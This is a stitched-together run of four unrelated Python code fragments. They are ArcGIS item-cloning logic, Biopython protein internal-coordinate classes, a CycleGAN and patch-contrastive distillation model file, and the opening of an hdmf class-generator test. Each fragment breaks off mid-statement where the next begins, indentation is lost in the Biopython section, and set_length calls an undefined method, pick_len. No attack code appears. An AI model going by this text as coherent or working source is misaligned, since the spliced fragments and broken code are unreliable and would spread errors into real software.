                                    app_json['map']['itemId'] = self._clone_mapping['Item IDs'][app_json['map']['itemId']]
                                if 'mapOptions' in app_json['map'] and app_json['map']['mapOptions'] is not None:
                                    if 'extent' in app_json['map']['mapOptions']:
                                        # drop the stale extent; the cloned map supplies its own
                                        del app_json['map']['mapOptions']['extent']
                            if 'httpProxy' in app_json:
                                if 'url' in app_json['httpProxy']:
                                    app_json['httpProxy']['url'] = org_url + "sharing/proxy"
                            if 'geometryService' in app_json and 'geometry' in self.target.properties['helperServices']:
                                app_json['geometryService'] = self.target.properties['helperServices']['geometry']['url']
                        else: #Configurable Application Template
                            if 'folderId' in app_json:
                                user = self.target.users.get(self.owner)
                                if self.folder is not None:
                                    folders = user.folders
                                    # match the target folder by case-insensitive title
                                    target_folder = next((f for f in folders if f['title'].lower() == self.folder.lower()), None)
                                    if target_folder:
                                        app_json['folderId'] = _deep_get(target_folder, 'id')
                                else:
                                    app_json['folderId'] = None
                            if 'values' in app_json:
                                if 'group' in app_json['values']:
                                    app_json['values']['group'] = self._clone_mapping['Group IDs'][app_json['values']['group']]
                                if 'webmap' in app_json['values']:
                                    if isinstance(app_json['values']['webmap'], list):
                                        new_webmap_ids = []
                                        for webmap_id in app_json['values']['webmap']:
                                            new_webmap_ids.append(self._clone_mapping['Item IDs'][webmap_id])
                                        app_json['values']['webmap'] = new_webmap_ids
                                    else:
                                        app_json['values']['webmap'] = self._clone_mapping['Item IDs'][app_json['values']['webmap']]
                            if self.source_app_title is not None:
                                # re-point 'source' at the newest esri_en template app with that title
                                search_query = 'title:"{0}" AND owner:{1} AND type:Web Mapping Application'.format(self.source_app_title, "esri_en")
                                search_items = self.target.content.search(search_query, max_items=100, outside_org=True)
                                if len(search_items) > 0:
                                    existing_item = max(search_items, key=lambda x: x['created'])
                                    app_json['source'] = existing_item['id']
                        app_json_text = json.dumps(app_json)
                        # swizzle service urls and layer ids via case-insensitive text substitution
                        for original_url in self._clone_mapping['Services']:
                            service = self._clone_mapping['Services'][original_url]
                            for key, value in service['layer_id_mapping'].items():
                                app_json_text = re.sub("{0}/{1}".format(original_url, key),
                                                       "{0}/{1}".format(service['url'], value),
                                                       app_json_text, 0, re.IGNORECASE)
                            app_json_text = re.sub(original_url, service['url'], app_json_text, 0, re.IGNORECASE)
                        for original_id in self._clone_mapping['Item IDs']:
                            app_json_text = re.sub(original_id, self._clone_mapping['Item IDs'][original_id], app_json_text, 0, re.IGNORECASE)
                        for original_web_tool in self._clone_mapping['Web Tools']:
                            app_json_text = re.sub(original_web_tool, self._clone_mapping['Web Tools'][original_web_tool], app_json_text, 0, re.IGNORECASE)
                        # Replace any references to default print service
                        new_print_url = _deep_get(self.target.properties, 'helperServices', 'printTask', 'url')
                        if new_print_url is not None:
                            old_print_url = 'https://utility.arcgisonline.com/arcgis/rest/services/Utilities/PrintingTools/GPServer/Export%20Web%20Map%20Task'
                            if self.portal_item is not None and _deep_get(self.portal_item._gis.properties, 'helperServices', 'printTask', 'url') is not None:
                                old_print_url = _deep_get(self.portal_item._gis.properties, 'helperServices', 'printTask', 'url')
                            app_json_text = re.sub(old_print_url, new_print_url, app_json_text, 0, re.IGNORECASE)
                            # also catch the opposite-scheme (http/https) form of the old url
                            if old_print_url.startswith('https://'):
                                app_json_text = re.sub('http://' + old_print_url[8:], new_print_url, app_json_text, 0, re.IGNORECASE)
                            elif old_print_url.startswith('http://'):
                                app_json_text = re.sub('https://' + old_print_url[7:], new_print_url, app_json_text, 0, re.IGNORECASE)
                        # Perform a general find and replace of field names if field mapping is required
                        for service in self._clone_mapping['Services']:
                            for layer_id in self._clone_mapping['Services'][service]['layer_field_mapping']:
                                field_mapping = self._clone_mapping['Services'][service]['layer_field_mapping'][layer_id]
                                app_json_text = _find_and_replace_fields(app_json_text, field_mapping)
                        # Replace any references to the original org url with the target org url. Used to re-point item resource references
                        if original_item['url'] is not None:
                            url = original_item['url']
                            find_string = "/apps/"
                            index = url.find(find_string)
                            if index != -1:
                                source_org_url = url[:index+1]
                                app_json_text = re.sub(source_org_url, org_url, app_json_text, 0, re.IGNORECASE)
                    item_properties['text'] = app_json_text
                # Add the new item
                new_item = self._add_new_item(item_properties)
                # Update the url of the item to point to the new portal and new id of the application if required
                if original_item['url'] is not None:
                    url = original_item['url']
                    if self.update_url:
                        find_string = "/apps/"
                        index = original_item['url'].find(find_string)
                        url = '{0}{1}'.format(org_url.rstrip('/'), original_item['url'][index:])
                        find_string = "id="
                        index = url.find(find_string)
                        url = '{0}{1}'.format(url[:index + len(find_string)], new_item.id)
                    item_properties = {'url' : url}
                    new_item.update(item_properties)
                # Add a code attachment if the application is Web AppBuilder so that it can be downloaded
                if is_web_appbuilder:
                    url = '{0}sharing/rest/content/items/{1}/package'.format(org_url[org_url.find('://') + 1:], new_item['id'])
                    code_attachment_properties = {'title' : new_item['title'], 'type' : 'Code Attachment', 'typeKeywords' : 'Code,Web Mapping Application,Javascript',
                                                  'relationshipType' : 'WMA2Code', 'originItemId' : new_item['id'], 'url' : url }
                    code_attachment = self.target.content.add(item_properties=code_attachment_properties, folder=self.folder, owner=self.owner)
                # With Portal sometimes after sharing the application the url is reset.
                # Check if the url is incorrect after sharing and set back to correct url.
                if 'url' in new_item and new_item['url'] is not None:
                    url = new_item['url']
                    new_item = self.target.content.get(new_item['id'])
                    if new_item['url'] != url:
                        new_item.update({'url': url})
            _share_item_with_groups(new_item, self.sharing, self._clone_mapping["Group IDs"])
            self.resolved=True
            self._clone_mapping['Item IDs'][original_item['id']] = new_item['id']
            return new_item
        except Exception as ex:
            raise _ItemCreateException("Failed to create {0} {1}: {2}".format(original_item['type'], original_item['title'], str(ex)), new_item)
class _FormDefinition(_ItemDefinition):
"""
Represents the definition of an form within ArcGIS Online or Portal.
"""
def __init__(self, target, clone_mapping, info, related_items, data=None, sharing=None, thumbnail=None, portal_item=None, folder=None, | |
self.hedra.get(angle_key, None)
elif ':' in angle_key:
angle_key = self._get_ak_tuple(angle_key)
rval = self.dihedra.get(angle_key, None)
elif 'psi' == angle_key:
if 0 == len(self.rnext):
return None
rn = self.rnext[0]
sN, sCA, sC = self.rak('N'), self.rak('CA'), self.rak('C')
nN = rn.rak('N')
rval = self.dihedra.get((sN, sCA, sC, nN), None)
elif 'phi' == angle_key:
if 0 == len(self.rprev):
return None
rp = self.rprev[0]
pC, sN, sCA = rp.rak('C'), self.rak('N'), self.rak('CA')
sC = self.rak('C')
rval = rp.dihedra.get((pC, sN, sCA, sC), None)
elif 'omg' == angle_key or 'omega' == angle_key:
if 0 == len(self.rprev):
return None
rp = self.rprev[0]
pCA, pC, sN = rp.rak('CA'), rp.rak('C'), self.rak('N')
sCA = self.rak('CA')
rval = rp.dihedra.get((pCA, pC, sN, sCA), None)
elif angle_key.startswith('chi'):
sclist = pic_data_sidechains.get(self.lc, None)
if sclist is None:
return None
for akl in sclist:
if 5 == len(akl):
if akl[4] == angle_key:
klst = [self.rak(a) for a in akl[0:4]]
rval = self.dihedra.get(tuple(klst), None)
return rval
def get_angle(self, angle_key):
"""Get dihedron or hedron angle for specified key.
See pick_angle() for key specifications.
"""
rval = self.pick_angle(angle_key)
if rval is not None:
return rval.get_angle()
return None
def set_angle(self, angle_key, v):
"""Set dihedron or hedron angle for specified key.
See pick_angle() for key specifications.
"""
rval = self.pick_angle(angle_key)
if rval is not None:
rval.set_angle(v)
def pick_length(self, ak_spec):
"""Get list of hedra containing specified atom pair.
:param ak_spec: str or tuple of AtomKeys
str: Two atom names separated by ':', e.g. 'N:CA'
Optional position specifier relative to self,
e.g. '-1C:N' for preceding peptide bond.
"""
rlst = []
if ':' in ak_spec:
ak_spec = self._get_ak_tuple(ak_spec)
for hed_key, hed_val in self.hedra.items():
if all(ak in hed_key for ak in ak_spec):
rlst.append(hed_val)
return rlst, ak_spec
def get_length(self, ak_spec):
"""Get bond length for specified atom pair.
See pick_length() for ak_spec.
"""
hed_lst, ak_spec = self.pick_length(ak_spec)
for hed in hed_lst:
val = hed.get_length(ak_spec)
if val is not None:
return val
return None
def set_length(self, ak_spec, val):
"""Set bond length for specified atom pair.
See pick_length() for ak_spec.
"""
hed_lst, ak_spec = self.pick_len(ak_spec)
for hed in hed_lst:
hed.set_length(ak_spec, val)
def applyMtx(self, mtx):
"""Apply matrix to atom_coords for this residue."""
for ak, ac in self.atom_coords.items():
# self.atom_coords[ak] = mtx @ ac
self.atom_coords[ak] = mtx.dot(ac)
class IC_Chain:
"""Class to extend Biopython Chain with internal coordinate data.
Attributes
----------
MaxPeptideBond : Class attribute to detect chain breaks. Override for
    fully contiguous chains with some very long bonds - e.g. for 3D
    printing (OpenSCAD output) a structure with fully disordered (missing)
    residues.
chain : biopython Chain object reference
The Chain object this extends
ordered_aa_pic_list : list of IC_Residue objects
IC_Residue objects PIC algorithms can process (e.g. no waters)
initNCaC : AtomKey indexed dictionary of N, Ca, C atom coordinates to start
chain segments (first residue or after chain break)
Methods
-------
set_residues()
Add .pic attribute for all Residues, populate ordered_aa_pic_list, set
IC_Residue rprev, rnext or initNCaC coordinates
link_residues()
Call link_dihedra() on each IC_Residue (needs rprev, rnext set)
render_dihedra()
Call render_hedra() and render_dihedra() on each IC_Residue
assemble_residues()
Generate IC_Residue atom coords from internal coordinates
coords_to_structure()
update Biopython Residue.Atom coords for all Residues with IC_Residue
attributes
internal_to_atom_coordinates()
Process pic data to Residue/Atom coordinates
dihedra_from_atoms()
Calculate dihedrals, angles, bond lengths for Atom data
"""
MaxPeptideBond = 1.4
def __init__(self, parent):
"""Initialize IC_Chain object, with or without residue/Atom data.
:param parent: Biopython Chain object
Chain object this extends
"""
self.chain = parent
self.ordered_aa_pic_list = []
self.initNCaC = {}
self.sqMaxPeptideBond = (IC_Chain.MaxPeptideBond
* IC_Chain.MaxPeptideBond)
self.set_residues() # no effect if no residues loaded
def _peptide_check(self, prev, curr):
if 0 == len(curr.child_dict):
# curr residue with no atoms => reading pic file, no break
return True
if ((0 != len(curr.child_dict))
and (0 == len(prev.child_dict))):
# prev residue with no atoms, curr has atoms => reading pic file,
# have break
return False
# both biopython Resdiues have Atoms, so check distance
Natom = curr.child_dict.get('N', None)
pCatom = prev.child_dict.get('C', None)
if Natom is None or pCatom is None:
return False
# confirm previous residue has all backbone atoms
pCAatom = prev.child_dict.get('CA', None)
pNatom = prev.child_dict.get('N', None)
if pNatom is None or pCAatom is None:
return False
if Natom.is_disordered():
Natom = Natom.selected_child
if pCatom.is_disordered():
pCatom = pCatom.selected_child
diff = curr['N'].coord - prev['C'].coord
sum = 0
for axis in diff:
if axis > self.MaxPeptideBond:
return False
sum += axis * axis
if sum > self.sqMaxPeptideBond:
return False
return True
    def _add_residue(self, res, last_res, last_ord_res):
        """Set rprev, rnext, determine chain break.

        :param res: Biopython Residue to process
        :param last_res: list of IC_Residues at the immediately previous position
        :param last_ord_res: list of IC_Residues at the previous *ordered* position
        :return: True if res could be linked or is a valid restart point
        """
        if not hasattr(res, 'internal_coord'):
            res.internal_coord = IC_Residue(res)
        if (0 < len(last_res) and last_ord_res == last_res
                and self._peptide_check(last_ord_res[0].residue, res)):
            # no chain break
            for prev in last_ord_res:
                prev.rnext.append(res.internal_coord)
                res.internal_coord.rprev.append(prev)
            return True
        elif all(atm in res.child_dict for atm in ('N', 'CA', 'C')):
            # chain break, save coords for restart
            initNCaC = {}
            rpic = res.internal_coord
            for atm in ('N', 'CA', 'C'):
                bpAtm = res.child_dict[atm]
                if bpAtm.is_disordered():
                    # record the coordinates of every alternate location
                    for altAtom in bpAtm.child_dict.values():
                        ak = AtomKey(rpic, altAtom)
                        initNCaC[ak] = IC_Residue.atm241(
                            altAtom.coord)
                else:
                    ak = AtomKey(rpic, bpAtm)
                    initNCaC[ak] = IC_Residue.atm241(
                        bpAtm.coord)
            self.initNCaC[rpic.rbase] = initNCaC
            return True
        elif (0 == len(res.child_list) and
              self.chain.child_list[0].id == res.id and
              res.internal_coord.is20AA):
            # this is first residue, no atoms at all, is std amino acid
            # conclude reading PIC file with no N-Ca-C coords
            return True
        # chain break but do not have N, Ca, C coords to restart from
        return False
    def set_residues(self):
        """Initialize pic data for loaded Residues.

        Add IC_Residue as .pic attribute for each Residue in parent Chain;
        populate ordered_aa_pic_list with IC_Residue references for residues
        which can be built (amino acids and some hetatms); set rprev and rnext
        on each sequential IC_Residue, populate initNCaC at start and after
        chain breaks.
        """
        # ndx = 0
        last_res = []
        last_ord_res = []
        for res in self.chain.get_residues():
            # select only not hetero or accepted hetero
            if res.id[0] == ' ' or res.id[0] in IC_Residue.accept_resnames:
                this_res = []
                if 2 == res.is_disordered():
                    # fully disordered: process each alternate residue separately
                    # print('disordered res:', res.is_disordered(), res)
                    for r in res.child_dict.values():
                        if self._add_residue(r, last_res, last_ord_res):
                            this_res.append(r.internal_coord)
                else:
                    if self._add_residue(res, last_res, last_ord_res):
                        this_res.append(res.internal_coord)
                if 0 < len(this_res):
                    self.ordered_aa_pic_list.extend(this_res)
                    # only advance the 'ordered' marker when something was accepted
                    last_ord_res = this_res
                last_res = this_res
def link_residues(self):
"""link_dihedra() for each IC_Residue; needs rprev, rnext set."""
for rpic in self.ordered_aa_pic_list:
rpic.link_dihedra()
def render_dihedra(self):
"""Set dihedron local coords for each IC_Residue."""
for rpic in self.ordered_aa_pic_list:
rpic.render_dihedra()
    def assemble_residues(self, start=False, fin=False):
        """Generate IC_Residue atom coords from internal coordinates.

        Filter positions between start and fin if set, find appropriate start
        coordinates for each residue and pass to IC_Residue.assemble()

        :param start, fin: lists
            sequence position, insert code for begin, end of subregion to
            process
        """
        for rpic in self.ordered_aa_pic_list:
            resSeq, resicode = rpic.residue.id[1:]
            go = True
            # NOTE(review): the insert-code comparisons ('<' for start,
            # '>' for fin) are opposite in direction to the seq-number
            # comparisons — confirm intended ordering of insertion codes
            if (start and
                    (start[0] > resSeq or
                     (start[0] == resSeq and start[1] < resicode))):
                go = False
            if (go and fin and
                    (fin[0] < resSeq or
                     (fin[0] == resSeq and fin[1] > resicode))):
                go = False
            if go:
                rpic.atom_coords = rpic.assemble()
                # refresh the atom-key set to match the assembled coordinates
                rpic.ak_set = set(rpic.atom_coords.keys())
def coords_to_structure(self):
"""All pic atom_coords to Biopython Residue/Atom coords."""
self.ndx = 0
for res in self.chain.get_residues():
if 2 == res.is_disordered():
for r in res.child_dict.values():
if hasattr(r, 'internal_coord'):
r.internal_coord.coords_to_residue()
elif hasattr(res, 'internal_coord'):
res.internal_coord.coords_to_residue()
# TODO: fix to allow only updating parts of structure
# esp sidechain rotamers
def internal_to_atom_coordinates(self):
"""Complete process pic data to Residue/Atom coords."""
# self.link_residues()
# self.render_dihedra()
self.assemble_residues()
self.coords_to_structure()
def dihedra_from_atoms(self, allBonds=False):
"""Calculate dihedrals, angles, bond lengths for Atom data."""
for rpic in self.ordered_aa_pic_list:
rpic.dihedra_from_atoms(allBonds)
@staticmethod
def _write_mtx(fp, mtx):
fp.write('[ ')
rowsStarted = False
for row in mtx:
if rowsStarted:
fp.write(', [ ')
else:
fp.write('[ ')
rowsStarted = True
colsStarted = False
for col in row:
if colsStarted:
fp.write(', ' + str(col))
else:
fp.write(str(col))
colsStarted = True
fp.write(' ]') # close row
fp.write(' ]')
@staticmethod
def _writeSCAD_dihed(fp, d, transformations, hedraNdx, hedraSet):
fp.write('[ {:9.5f}, {}, {}, {}, '.format(d.dihedral1,
hedraNdx[d.h1key],
hedraNdx[d.h2key],
(1 if d.reverse else 0)))
fp.write('{}, {}, '.format((0 if d.h1key in hedraSet else 1),
(0 if d.h2key in hedraSet else 1)))
fp.write(' // {} [ {} -- {} ] {}\n'.format(d.id, d.hedron1.id,
d.hedron2.id,
('reversed' if | |
import torch
import itertools
from util.image_pool import ImagePool
from .base_model import BaseModel
from pytorch_wavelets import DWTForward, DWTInverse
from . import networks
from packaging import version
import torch.nn.functional as F
import torch.nn as nn
from torch.nn import init
import numpy as np
cross_entropy_loss = torch.nn.CrossEntropyLoss()
'''
def get_sample_ids(s, t, temperature=0.1):
s = s.permute(0, 2, 3, 1).flatten(1, 2)
t = t.permute(0, 2, 3, 1).flatten(1, 2)
# b x wh x c
s_attention = torch.mean(torch.abs(s), [2])
t_attention = torch.mean(torch.abs(t), [2])
attention = s_attention + t_attention
attention = attention.view(-1)
attention = F.softmax(attention/temperature) + 1e-8
indices = np.arange(attention.shape[0])
sample_result = np.random.choice(a=indices, size=64, replace=False, p=attention.cpu().detach().numpy())
sample_result = torch.LongTensor(sample_result)
#value, indexs = torch.sort(attention, dim=0, descending=True)
return [sample_result] #indexs[:64]
'''
def get_sample_ids(s, t, temperature=0.1):
    """Select the 64 most-attended spatial positions shared by two feature maps.

    Attention per position is the sum of the channel-mean absolute activations
    of the student (s) and teacher (t) features.

    :param s: student feature map, B x C x H x W
    :param t: teacher feature map, B x C x H x W
    :param temperature: unused; kept for interface compatibility with the
        softmax-sampling variant above
    :return: single-element list holding a tensor of the top-64 flat indices
    """
    s = s.permute(0, 2, 3, 1).flatten(1, 2)
    t = t.permute(0, 2, 3, 1).flatten(1, 2)
    # b x wh x c -> b x wh attention maps
    s_attention = torch.mean(torch.abs(s), [2])
    t_attention = torch.mean(torch.abs(t), [2])
    attention = (s_attention + t_attention).view(-1)
    # FIX: sorted values were bound but never used; keep only the indices
    _, indexs = torch.sort(attention, dim=0, descending=True)
    return [indexs[:64]]
def init_weights(net, init_type='normal', init_gain=0.02, debug=False):
    """Initialize network weights.

    Parameters:
        net (network)     -- network to be initialized
        init_type (str)   -- the name of an initialization method: normal | xavier | kaiming | orthogonal
        init_gain (float) -- scaling factor for normal, xavier and orthogonal.
        debug (bool)      -- print the class name of each initialized layer

    'normal' is what the original pix2pix and CycleGAN paper used, but xavier
    and kaiming might work better for some applications.
    """
    def _init_module(m):
        cls_name = m.__class__.__name__
        if hasattr(m, 'weight') and ('Conv' in cls_name or 'Linear' in cls_name):
            if debug:
                print(cls_name)
            if init_type == 'normal':
                init.normal_(m.weight.data, 0.0, init_gain)
            elif init_type == 'xavier':
                init.xavier_normal_(m.weight.data, gain=init_gain)
            elif init_type == 'kaiming':
                init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')
            elif init_type == 'orthogonal':
                init.orthogonal_(m.weight.data, gain=init_gain)
            else:
                raise NotImplementedError('initialization method [%s] is not implemented' % init_type)
            if hasattr(m, 'bias') and m.bias is not None:
                init.constant_(m.bias.data, 0.0)
        elif 'BatchNorm2d' in cls_name:
            # BatchNorm Layer's weight is not a matrix; only normal distribution applies.
            init.normal_(m.weight.data, 1.0, init_gain)
            init.constant_(m.bias.data, 0.0)

    net.apply(_init_module)
def init_net(net, init_type='normal', init_gain=0.02, gpu_ids=[], debug=False, initialize_weights=True):
    """Register a network on GPU (with multi-GPU support) and initialize its weights.

    Parameters:
        net (network)      -- the network to be initialized
        init_type (str)    -- the name of an initialization method: normal | xavier | kaiming | orthogonal
        init_gain (float)  -- scaling factor for normal, xavier and orthogonal.
        gpu_ids (int list) -- which GPUs the network runs on: e.g., 0,1,2
        debug (bool)       -- print each initialized layer's class name
        initialize_weights (bool) -- skip weight initialization when False

    Return the (possibly initialized) network.
    """
    if gpu_ids:
        assert torch.cuda.is_available()
        net.to(gpu_ids[0])
        # if not amp:
        #     net = torch.nn.DataParallel(net, gpu_ids)  # multi-GPUs for non-AMP training
    if initialize_weights:
        init_weights(net, init_type, init_gain=init_gain, debug=debug)
    return net
class Normalize(nn.Module):
    """Lp-normalize feature vectors along dim 1 (with a small epsilon)."""

    def __init__(self, power=2):
        super(Normalize, self).__init__()
        self.power = power

    def forward(self, x):
        p = self.power
        # per-sample Lp norm, kept as a broadcastable column
        norm = x.pow(p).sum(1, keepdim=True).pow(1. / p)
        return x.div(norm + 1e-7)
class PatchNCELoss(nn.Module):
    """Patch-wise InfoNCE (contrastive) loss as used in CUT: one positive
    (the matching teacher patch) against the other patches of the same image."""

    def __init__(self, opt):
        super().__init__()
        self.opt = opt
        # reduction='none': keep per-patch losses; the mean is taken in forward()
        self.cross_entropy_loss = torch.nn.CrossEntropyLoss(reduction='none')
        # torch < 1.2 has no torch.bool dtype
        self.mask_dtype = torch.uint8 if version.parse(torch.__version__) < version.parse('1.2.0') else torch.bool

    def forward(self, feat_q, feat_k):
        # Contrastive loss; feat_q: student (query) features, feat_k: teacher (key) features
        batchSize = feat_q.shape[0]
        dim = feat_q.shape[1]
        # teacher features are targets only; no gradient flows through them
        feat_k = feat_k.detach()
        # pos logit
        l_pos = torch.bmm(feat_q.view(batchSize, 1, -1), feat_k.view(batchSize, -1, 1))
        l_pos = l_pos.view(batchSize, 1)
        # neg logit

        # Should the negatives from the other samples of a minibatch be utilized?
        # In CUT and FastCUT, we found that it's best to only include negatives
        # from the same image. Therefore, we set
        # --nce_includes_all_negatives_from_minibatch as False
        # However, for single-image translation, the minibatch consists of
        # crops from the "same" high-resolution image.
        # Therefore, we will include the negatives from the entire minibatch.
        # NOTE(review): forward() overwrites these two opt fields on every call,
        # ignoring whatever the caller configured — confirm this is intended
        self.opt.nce_includes_all_negatives_from_minibatch = False
        self.opt.nce_T = 0.07
        if self.opt.nce_includes_all_negatives_from_minibatch:
            # reshape features as if they are all negatives of minibatch of size 1.
            batch_dim_for_bmm = 1
        else:
            batch_dim_for_bmm = self.opt.batch_size
        # reshape features to batch size
        feat_q = feat_q.view(batch_dim_for_bmm, -1, dim)
        feat_k = feat_k.view(batch_dim_for_bmm, -1, dim)
        npatches = feat_q.size(1)
        # all-pairs similarity within each image: b x npatches x npatches
        l_neg_curbatch = torch.bmm(feat_q, feat_k.transpose(2, 1))

        # diagonal entries are similarity between same features, and hence meaningless.
        # just fill the diagonal with very small number, which is exp(-10) and almost zero
        diagonal = torch.eye(npatches, device=feat_q.device, dtype=self.mask_dtype)[None, :, :]
        l_neg_curbatch.masked_fill_(diagonal, -10.0)
        l_neg = l_neg_curbatch.view(-1, npatches)

        # class 0 (the positive logit, first column) is always the target
        out = torch.cat((l_pos, l_neg), dim=1) / self.opt.nce_T
        loss = self.cross_entropy_loss(out, torch.zeros(out.size(0), dtype=torch.long,
                                                        device=feat_q.device))
        return loss.mean()
# Randomly sample a subset of patch features for distillation
class PatchSampleF(nn.Module):
    """Samples patch feature vectors from a list of feature maps, optionally
    projecting each level through a small MLP and L2-normalizing the result."""

    def __init__(self, use_mlp=False, init_type='normal', init_gain=0.02, nc=256, gpu_ids=[0]):
        # potential issues: currently, we use the same patch_ids for multiple images in the batch
        super(PatchSampleF, self).__init__()
        self.l2norm = Normalize(2)
        self.use_mlp = use_mlp
        self.nc = nc  # hard-coded
        self.mlp_init = False
        self.init_type = init_type
        self.init_gain = init_gain
        self.gpu_ids = gpu_ids

    def create_mlp(self, feats):
        # lazily build one 2-layer MLP per feature level, sized from the input channels
        for mlp_id, feat in enumerate(feats):
            input_nc = feat.shape[1]
            mlp = nn.Sequential(*[nn.Linear(input_nc, self.nc), nn.ReLU(), nn.Linear(self.nc, self.nc)])
            if len(self.gpu_ids) > 0:
                mlp.cuda()
            setattr(self, 'mlp_%d' % mlp_id, mlp)
        init_net(self, self.init_type, self.init_gain, self.gpu_ids)
        self.mlp_init = True

    def forward(self, feats, num_patches=64, patch_ids=None):
        # Input: list of feature maps; output: the sampled (projected) features
        return_ids = []
        return_feats = []
        if self.use_mlp and not self.mlp_init:
            self.create_mlp(feats)
        for feat_id, feat in enumerate(feats):
            B, H, W = feat.shape[0], feat.shape[2], feat.shape[3]
            # B x H*W x C
            feat_reshape = feat.permute(0, 2, 3, 1).flatten(1, 2)
            if num_patches > 0:
                if patch_ids is not None:
                    # reuse caller-supplied sample locations
                    patch_id = patch_ids[feat_id]
                else:
                    patch_id = torch.randperm(feat_reshape.shape[1], device=feats[0].device)
                    patch_id = patch_id[:int(min(num_patches, patch_id.shape[0]))]  # .to(patch_ids.device)
                x_sample = feat_reshape[:, patch_id, :].flatten(0, 1)  # reshape(-1, x.shape[1])
            else:
                # num_patches == 0: keep every spatial position
                x_sample = feat_reshape
                patch_id = []
            if self.use_mlp:
                mlp = getattr(self, 'mlp_%d' % feat_id)
                x_sample = mlp(x_sample)
            return_ids.append(patch_id)
            x_sample = self.l2norm(x_sample)

            if num_patches == 0:
                # restore spatial layout: B x C x H x W
                x_sample = x_sample.permute(0, 2, 1).reshape([B, x_sample.shape[-1], H, W])
            return_feats.append(x_sample)
        # return the features and the patch ids used for sampling
        return return_feats, return_ids
def get_gram(feat):
    """Compute the Gram matrix of a feature map.

    :param feat: feature tensor [B x C x W x H]
    :return: Gram matrix [B x C x C]
    """
    batch, channels = feat.size(0), feat.size(1)
    flat = feat.view(batch, channels, -1)           # b x c x wh
    return torch.bmm(flat, flat.permute(0, 2, 1))   # b x c x c
def sample_gumbel(shape, eps=1e-20):
    """Draw Gumbel(0, 1) noise of the given shape.

    :param shape: output tensor shape
    :param eps: numerical-stability constant inside the logs
    :return: tensor of Gumbel samples (placed on GPU when available)
    """
    U = torch.rand(shape)
    # BUG FIX: the unconditional .cuda() crashed on CPU-only machines;
    # keep GPU placement when CUDA is available for backward compatibility.
    if torch.cuda.is_available():
        U = U.cuda()
    return -torch.log(-torch.log(U + eps) + eps)
def gumbel_softmax_sample(logits, temperature=1):
    """Softmax over logits perturbed by Gumbel noise (a soft sample)."""
    noisy = logits + sample_gumbel(logits.size())
    return F.softmax(noisy / temperature, dim=-1)
def gumbel_softmax(logits, temperature=1, hard=False):
    """
    ST-gumple-softmax
    input: [*, n_class]
    return: flatten --> [*, n_class] an one-hot vector (when hard=True)
    """
    soft = gumbel_softmax_sample(logits, temperature)
    if not hard:
        return soft
    # hard: one-hot argmax in the forward pass ...
    shape = soft.size()
    _, ind = soft.max(dim=-1)
    one_hot = torch.zeros_like(soft).view(-1, shape[-1])
    one_hot.scatter_(1, ind.view(-1, 1), 1)
    one_hot = one_hot.view(*shape)
    # ... but gradients w.r.t. the soft sample in the backward pass
    return (one_hot - soft).detach() + soft
class CycleGANModel(BaseModel):
"""
This class implements the CycleGAN model, for learning image-to-image translation without paired data.
The model training requires '--dataset_mode unaligned' dataset.
By default, it uses a '--netG resnet_9blocks' ResNet generator,
a '--netD basic' discriminator (PatchGAN introduced by pix2pix),
and a least-square GANs objective ('--gan_mode lsgan').
CycleGAN paper: https://arxiv.org/pdf/1703.10593.pdf
"""
@staticmethod
def modify_commandline_options(parser, is_train=True):
"""Add new dataset-specific options, and rewrite default values for existing options.
Parameters:
parser -- original option parser
is_train (bool) -- whether training phase or test phase. You can use this flag to add training-specific or test-specific options.
Returns:
the modified parser.
For CycleGAN, in addition to GAN losses, we introduce lambda_A, lambda_B, and lambda_identity for the following losses.
A (source domain), B (target domain).
Generators: G_A: A -> B; G_B: B -> A.
Discriminators: D_A: G_A(A) vs. B; D_B: G_B(B) vs. A.
Forward cycle loss: lambda_A * ||G_B(G_A(A)) - A|| (Eqn. (2) in the paper)
Backward cycle loss: lambda_B * ||G_A(G_B(B)) - B|| (Eqn. (2) in the paper)
Identity loss (optional): lambda_identity * (||G_A(B) - B|| * lambda_B + ||G_B(A) - A|| * lambda_A) (Sec 5.2 "Photo generation from paintings" in the paper)
Dropout is not used in the original CycleGAN paper.
"""
parser.set_defaults(no_dropout=True) # default CycleGAN did not use dropout
if is_train:
parser.add_argument('--lambda_A', type=float, default=10.0, help='weight for cycle loss (A -> B -> A)')
parser.add_argument('--lambda_B', type=float, default=10.0, help='weight for cycle loss (B -> A -> B)')
parser.add_argument('--lambda_identity', type=float, default=0.5,
help='use identity mapping. Setting lambda_identity other than 0 has an effect of scaling the weight of the identity mapping loss. For example, if the weight of the identity loss should be 10 times smaller than | |
<gh_stars>10-100
import numpy as np
import os
import shutil
import tempfile
from hdmf.build import TypeMap, CustomClassGenerator
from hdmf.build.classgenerator import ClassGenerator, MCIClassGenerator
from hdmf.container import Container, Data, MultiContainerInterface, AbstractContainer
from hdmf.spec import GroupSpec, AttributeSpec, DatasetSpec, SpecCatalog, SpecNamespace, NamespaceCatalog, LinkSpec
from hdmf.testing import TestCase
from hdmf.utils import get_docval
from .test_io_map import Bar
from tests.unit.utils import CORE_NAMESPACE, create_test_type_map, create_load_namespace_yaml
class TestClassGenerator(TestCase):
    """Tests for ClassGenerator behavior and custom class-generator registration on a TypeMap."""

    def test_register_generator(self):
        """Test TypeMap.register_generator and ClassGenerator.register_generator."""
        class MyClassGenerator(CustomClassGenerator):

            @classmethod
            def apply_generator_to_field(cls, field_spec, bases, type_map):
                # claim every field so that process_field_spec is called for each one
                return True

            @classmethod
            def process_field_spec(cls, classdict, docval_args, parent_cls, attr_name, not_inherited_fields, type_map,
                                   spec):
                # append attr_name to classdict['__custom_fields__'] list
                classdict.setdefault('process_field_spec', list()).append(attr_name)

            @classmethod
            def post_process(cls, classdict, bases, docval_args, spec):
                # mark the classdict so the test can verify that post_process ran
                classdict['post_process'] = True

        spec = GroupSpec(
            doc='A test group specification with a data type',
            data_type_def='Baz',
            attributes=[
                AttributeSpec(name='attr1', doc='a string attribute', dtype='text')
            ]
        )
        spec_catalog = SpecCatalog()
        spec_catalog.register_spec(spec, 'test.yaml')
        namespace = SpecNamespace(
            doc='a test namespace',
            name=CORE_NAMESPACE,
            schema=[{'source': 'test.yaml'}],
            version='0.1.0',
            catalog=spec_catalog
        )
        namespace_catalog = NamespaceCatalog()
        namespace_catalog.add_namespace(CORE_NAMESPACE, namespace)
        type_map = TypeMap(namespace_catalog)
        type_map.register_generator(MyClassGenerator)
        cls = type_map.get_dt_container_cls('Baz', CORE_NAMESPACE)
        # the custom generator should have processed the single attribute and run post_process
        self.assertEqual(cls.process_field_spec, ['attr1'])
        self.assertTrue(cls.post_process)

    def test_bad_generator(self):
